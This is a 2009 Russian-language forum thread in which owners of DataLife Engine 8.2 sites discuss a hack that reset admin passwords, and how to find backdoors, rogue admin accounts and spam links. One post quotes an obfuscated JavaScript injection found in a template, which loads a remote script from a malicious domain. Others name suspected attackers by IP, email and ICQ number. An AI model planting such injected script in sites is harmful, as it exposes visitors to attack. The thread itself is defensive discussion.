Внимание всем у кого версия 8.2

[pagemaster 1]

и украинские и российские провайдеры

[freeprogs.kiev.ua 0]

я 18.08.2009 вписал в backup/.htaccess

строку

Order Deny,Allow

Deny from all

как я понимаю это меня спасло и базу никто не спер)))

но заметил почти все фалы шаблона изменены в 11.11.2009 в 00:01

посмотрел шаблоны, ничего подозрительного не заметил, никаких внешних ссылок вроде нет

Плохо смотришь, наверное. БД не слили, а в шаблон могли внести правки свои и лить трафик...

[mobirobi 6]

Так же взломали сайт 2-жды за сутки! Даже после патча! Версия 8.2

Это реально? В 8.2 есть еще дыра?

[djrogoff_ru 0]

Так же взломали сайт 2-жды за сутки! Даже после патча! Версия 8.2

Это реально? В 8.2 есть еще дыра?

Скорее всего вставили что-то и лезли после патча через свою дыру

Очень внимательно проверяйте логи и сессии на сервере

Возможно найдете интересных действий помимо кражи базы,а также вставки пары рекламных скриптов

Повторяю,очень внимательно проверяйте логи и сессии на сервере

[zimka 1]

хех походу сломали и самого celsoft так как взломали сегодня сайты которые стоят на поддомене типа демо=) Скорей всего слили там где хранятся логи активации где есть все ссылки сайтов активации скрипта....так как не могли знать сайт и делали это скорей всего через какой та скрипт даже icq оставили в контактах=)

[PaSSoR 19]

А чем опасен угод базы?

Только тем что мб он в паблик улетит?

[celsoft 5 995]

хех походу сломали и самого celsoft так как взломали сегодня сайты которые стоят на поддомене типа демо=) Скорей всего слили там где хранятся логи активации где есть все ссылки сайтов активации скрипта....так как не могли знать сайт и делали это скорей всего через какой та скрипт даже icq оставили в контактах=)

Активация вне доступа DLE, и чего то прочего, а получить список сайтов можно из любого поисковика. С сайта dle-news.ru ничего никуда и никогда не уходило.

Так же взломали сайт 2-жды за сутки! Даже после патча! Версия 8.2

Патч закрывает ошибку, а не гарантирует вам безопасность, если доступ был получен, значит мог быть оставлен бекдор, например в шаблоне, или создан другой админский логин, нужно было проверять сайт на сделанные в нем изменения.

А чем опасен угод базы?

Только тем что мб он в паблик улетит?

Опасен доступ к админпанели, а не БД.

[Aleko 1]

Злоумышленник изменил админский пароль и создал новый логин с админскими правами и почтовым ящиком sborpochti (гав] gmail.сom

Так что в первую очередь проверьте новых админов :-)

[dleua 4]

вот нашел скрипт в main. Что, кто скажет про скрипт?

<script language="JavaScript">

    var lankru_html = '';

    lankru_html += '<scr' + 'ipt language="JavaSc' + 'ript" ';

    lankru_html += 'src="http://l';

    lankru_html += 'ankru1.ru/js.php?id=32201';

    lankru_html += '&url=' + encodeURIComponent(document.location);

    lankru_html += '&rnd=' + Math.random() + '"></scr' + 'ipt>';

    document.write(lankru_html);

</script>

Имеется информация о том, что сайт lankru1.ru используется для атак на компьютеры пользователей. В соответствии с вашими настройками безопасности он был заблокирован.

Изменено 12 ноября 2009 пользователем dedywka

[Sarvan 35]

Мдя....... Вообще думаю версию движка светить тоже не хорошая идея http://dle-news.ru/engine/skins/images/logos.jpg

Изменено 13 ноября 2009 пользователем Sarvan

[blaga 39]

Sarvan смените название этой картинки и тоже самое впишите у себя в файле \engine\skins\default.skin.php тогда не видно будет.

[djrogoff_ru 0]

так же проверяйте полную новость на наличие связки:

[url=http://kinowarez.ru][img=http://i34.tinypic.com/magmcl.jpg][/url]

[Mek 99]

Sarvan смените название этой картинки и тоже самое впишите у себя в файле \engine\skins\default.skin.php тогда не видно будет.

Я к примеру изменю этот путь с именем файла, потом ещё что нить поменяю для безопасности сайта. А потом выйдет новая версия скрипта и после обновления всё похерится. Неужели нельзя сделать обновление на новые версии без замены всех файлов? Вы же понимаете, что практически в каждом сайте люди вносят изменения непосредственно в файлы движка. Многие такие изменения делаются по ходу работы и запомнить их все просто нереально.

Я купил версию 8.2, настроил сайт на денвере, всё сконфигурировал, установил сайт на хостинг. Через 3 недели выходит 8.3, и тут же версия 8.2 становится не актуальной и тормозной ( судя из ЭТОЙ темы). Я скачиваю 8.3, опять же всё настраиваю на локальном компьютере, естественно это занимает некоторое время. ( нет я не тормоз, просто у меня кроме сайта есть ещё работа, личная жизнь и многое другое) Устанавливаю собранный сайт на хостинг. И через месяц опять выходит новая версия DLE. До этого актуальная и и стабильная версия скрипта тут же становится не актуальной и её советуют обновить на новую. И так по кругу.

[WWW.ZEOS.IN 1 161]

За 2009-11-11 у меня в админке DLE были такие IP:

1) 94.143.240.125

За 2009-11-12 у меня в админке DLE были такие IP:

1) 95.135.15.237

2) 193.138.247.180

3) 82.207.50.167

Делали бекапы, запускали антивирус, ну и конечно же каждый тырил шаблон

Думаю под этими IP на форуме зарегистрированы пользователи

Предлагаю их лишить лицензии, если она у них есть конечно

Изменено 13 ноября 2009 пользователем WWW.ZEOS.IN

[Gorets 3]

Пароль можно сменть совершенно любому пользователю сайта и потом зайти с его правами. В основном наверно меняли пароль пользователю с id=1 т.е. админу, а дальше делай с сайтом что хочешь. Действительно дырка ОЧЕНЬ опасная, поэтому предупредите всех своих знакомых, которые могут использовать DLE 8.2, чтобы они в срочном порядке ставили патч.

Если же Вы не можете зайти на свой сайт под старым паролем, то на 99% Ваш аккаунт взломан. Дальше надо ставить патч и искать, что злоумышленники могли натворить с сайтом. Например добавить в админы еще одного пользователя, слить бэкап Вашей базы, накидать спам-ссылок в новости и т.д. Желательно проверить логи сервера, чтобы разобраться что-же именно делал злоумышленник на сайте.

Еще раз напоминаю, что дырка касается только DLE версии 8.2, так что остальным опасаться не надо.

[planetaknig 0]

Уважаемые коллеги по несчастью!

Я тут порылся в интернете и нашел программу DLE PASSWORD GRABER!

Ставится как доп модуль к dle админеке.

Она по сути открывает хеш пароли из таблицы _users из базы dle.

Это значит что теперь те, кто слил базы с посетителями могут открыть их пароли не только к сайтам на которых они регились но и их почты.

Так как зачастую пароль люди хранят в голове один.

А теперь представьте на минуту какие могут быть последствия!

Я предлагаю всем кого коснулась беда.

1. Оповестить своих посетителей о том что бы они сменили пароли доступа на свои почтовые адреса.

1. Прошерстить всем свои базы на предмет привязки IP злоумышлеников к своим зарегеным юзерам и попробовать найти email адреса. Если таковы обноружены, отписывайтесь тут.

Изменено 13 ноября 2009 пользователем planetaknig

[PaSSoR 19]

Отправил всем знакомым, но уже поздно

[Mek 99]

Причём тут пароль от сайта и пароль от почты ? Если только они одинаковые

[PaSSoR 19]

При том, что на эту почту можно заказать пароль юзера/админа!

[zimka 1]

вот почта googl-man@yandex.ru вот icq 7599484 кто это делал...

[PaSSoR 19]

Вскрыть нечистоты!

Узнал на 1 сайте, что под этой ICQ ходит чувак и вскрывает аккаунты, его IP 94.143.240.125.

Почта не известна, но ник известен как Freet.

[WWW.ZEOS.IN 1 161]

вскрывает аккаунты, его IP 94.143.240.125

У меня он был еще 2009-11-11

[PaSSoR 19]

dle-82@yandex.ru

И вот эта почта обсуждается..У моего знакомого именно она прописана...!

[WMDrakon 20]

Можно начинать торговлю битами и другими бойцовскими штучками)))) Шучу)))

С Петрозаводска он, как я понимаю, да?

[globus 0]

Реально утром не мог зайти в адмику. Поставил патч, сменил пароль админа. Ни каких последстивий нет. Просто напросто они даже не могли обратится к файлу admin.php . Стоит дополнительная защита